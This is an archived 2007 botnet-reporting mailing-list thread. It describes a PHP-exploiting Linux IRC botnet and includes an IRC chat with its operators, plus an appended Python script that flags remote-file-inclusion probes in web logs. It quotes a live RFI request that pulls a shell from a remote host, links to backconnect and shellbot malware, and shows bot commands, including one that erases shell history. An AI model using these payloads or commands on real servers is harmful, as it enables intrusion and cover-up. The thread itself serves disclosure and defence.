To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

I mean that if you have a good reason you can try asking anybody from Shadowserver, but I hope it is a very huge list!!
http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.BotCounts

Btw: There is a very fast increase in the zombie count for the last two weeks, 800k hosts!!

On Wed, Mar 21, 2007 at 02:05:51PM -0400, Adriel T. Desautels wrote:
> List,
> I already have access to a list of C&C servers, but there is a list that
> I am missing. I'm very interested in getting a list of the IP addresses that
> the bots themselves are connecting from. Ie: What systems specifically did
> they infect? Is there a way to get such a list?
>
> On 3/21/07 2:03 PM, "David Vorel" <[EMAIL PROTECTED]> wrote:
>
> > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > ----------
> >
> > Hi all,
> >
> > nice shot Bodik ;] I found a different botnet on eu.undernet.org chan #vx8,
> > it's a linux zombie based botnet that spreads through various bugs in PHP.
> > Undernet admins, please take a look at it. Description follows. Botnet
> > herders are Denzel, xeQt, aslpls-.
> >
> > First attempt:
> >
> > 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"
> >
> > We mirror all links included, engine for RFI source is not completed
> > yet, so for this time I send raw urls.
> >
> > http://nawader.org/modules/Top/kgb.c
> > http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt
> > - PHP shell which includes other links
> >
> > http://nawader.org/modules/Top/bc.txt
> > http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
> > - Backconnect shell
> >
> > http://nawader.org/modules/Top/n.txt
> > http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
> > - Shellbot I, connect to eu.undernet.org #vx8
> >
> > http://nawader.org/modules/Top/teamrx
> > http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
> > - Loader for n.txt and bc.txt run backconnect and send shell to
> > 220.232.137.199 and 64.38.11.130
> >
> > http://nawader.org/modules/Top/toyo.txt
> > http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
> > - Shellbot II, connect to eu.undernet.org #vx8
> >
> > All scripts are labelled "xeQt vS TeaMrx".
> >
> > Who is on chan:
> >
> > http://www.honeynet.cz/trash/list
> >
> > After a while on channel bot herders move bots to another chan.
> >
> > #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
> > #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.
> >
> > Here is the list from uname -sr.
> >
> > http://www.honeynet.cz/trash/uname
> >
> > chat:
> >
> > <crop>
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould u
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
> > << PRIVMSG #vx8 :i now that you are criminal
> > << PRIVMSG #vx8 :but still on free ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$
> > << PRIVMSG xeQt :^AVERSION^A
> >>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC v6.17 Khaled Mardam-Bey^A
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
> > << PRIVMSG #vx8 :jail is for free
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
> > << PRIVMSG #vx8 :y are waiting for ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i goto wait
> > </crop>
> >
> > <crop>
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch any of the servers
> > << PRIVMSG #vx8 :when u installed your script throught bug in php that's touching too
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::)))
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to anything
> > << PRIVMSG #vx8 :yes u did
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my job
> > << PRIVMSG #vx8 :and that is ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass spread is?
> > << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
> > << PRIVMSG #vx8 :and what about this ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip address from that?
> > << PRIVMSG #vx8 :this command is better one..
> > << PRIVMSG #vx8 :<@xeQt> !x uname -sr
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) gid=33952(nucsaor) groups=33952(nucsaor)
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) gid=33(www-data) groups=33(www-data)
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www)
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www)
> > << PRIVMSG #vx8 :yes, now you are in direct connect with these servers ..
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you have no clue man
> > << PRIVMSG #vx8 :thats the point of abuse ..
> > << PRIVMSG #vx8 :these servers are yours ?
> > << PRIVMSG #vx8 :or not ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your pissed off, but this is useless
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make them trace me... but its useless
> > << PRIVMSG #vx8 :I think that all servers here are used to fraud ..
> > << PRIVMSG #vx8 :i dont think so ..
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE HISTSAVE
> > << PRIVMSG #vx8 :heh
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you get ip from that
> > << PRIVMSG #vx8 :from what ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac?
> > << PRIVMSG #vx8 :?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man
> > << PRIVMSG #vx8 :what ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting me
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont say no but.. goood luck
> > << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities.
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge
> > << PRIVMSG #vx8 :so what for now ?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you the victum..
> > << PRIVMSG #vx8 :i'm not victim ..
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me
> > << PRIVMSG #vx8 :others are victims ..
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop?
> > << PRIVMSG #vx8 :yes
> > << PRIVMSG #vx8 :;]
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and?
> >>> :[EMAIL PROTECTED] NICK :CopKiller
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do about it?
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, girlfriends....
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a fuck
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops
> > << PRIVMSG #vx8 :so kick me dude ;]
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to
> > << PRIVMSG #vx8 :heh
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill show you
> > << PRIVMSG #vx8 :i'm here
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood
> >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc
> > </crop>
> >
> > Cheers..
> >
> > David Vorel
> >
> > _______________________________________________
> > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > All list and server information are public and available to law enforcement
> > upon request.
> > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
>
> --
>
> Regards,
> Adriel T. Desautels
> Chief Technology Officer - Netragard, LLC
> Office: 617-934-0269 || Mobile : 857-636-8882
> http://www.linkedin.com/pub/1/118/a45
> http://www.netragard.com
> -------------------------
> "We make IT secure."
>

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
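
The access-log entry quoted in the report shows what a defender can search their own logs for: a query parameter whose value is an absolute remote URL, requested by a scripted client. The following is an added example, not part of the original thread; the function name, the user-agent patterns other than libwww-perl, and every sample line except the first are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
# Scripted-client hint: libwww-perl is from the report; the others are assumptions.
SCRIPTED_UA = re.compile(r"libwww-perl|python-requests|curl|wget", re.I)


def find_rfi_probes(lines):
    """Flag requests where a query parameter's value is an absolute remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format entry
        _path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second pass catches double-encoded values
            if REMOTE_URL.match(value):
                findings.append({
                    "client": m["ip"],
                    "time": m["ts"],
                    "param": name,
                    "remote_url": value,
                    "remote_host": urlsplit(value).hostname,
                    "status": int(m["status"]),
                    "scripted_ua": bool(SCRIPTED_UA.search(m["ua"])),
                })
    return findings


# First line is the entry quoted in the report; the other two are constructed.
SAMPLE_LOG = [
    '85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [20/Mar/2007:04:11:02 +0100] "GET /index.php?loc=http%3A%2F%2Fexample.net%2Fx.txt%3F HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.20 - - [20/Mar/2007:04:12:30 +0100] "GET /index.php?loc=about HTTP/1.1" 200 5120 "http://example.org/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG):
        print(f["time"], f["client"], f["param"], f["remote_host"], f["status"], f["scripted_ua"])
```

A hit shows only that the request was made, not that the include succeeded, and legitimate redirect parameters also carry URLs, so hits need review against what the application does with the parameter.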
